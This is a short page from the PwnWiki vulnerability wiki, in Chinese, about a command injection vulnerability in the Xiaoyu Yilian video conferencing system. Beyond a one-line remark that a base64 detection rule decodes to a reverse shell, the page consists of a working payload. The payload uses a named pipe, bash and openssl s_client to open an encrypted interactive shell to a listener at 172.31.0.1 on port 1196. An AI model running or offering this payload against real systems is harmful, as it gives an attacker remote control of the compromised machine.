Loading
0

小鱼易连视频会议系统命令注入漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

描述

特征发现:匹配规则base64编码

解码特征(存在反弹shell)

Payload

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s

PWNWIK.COM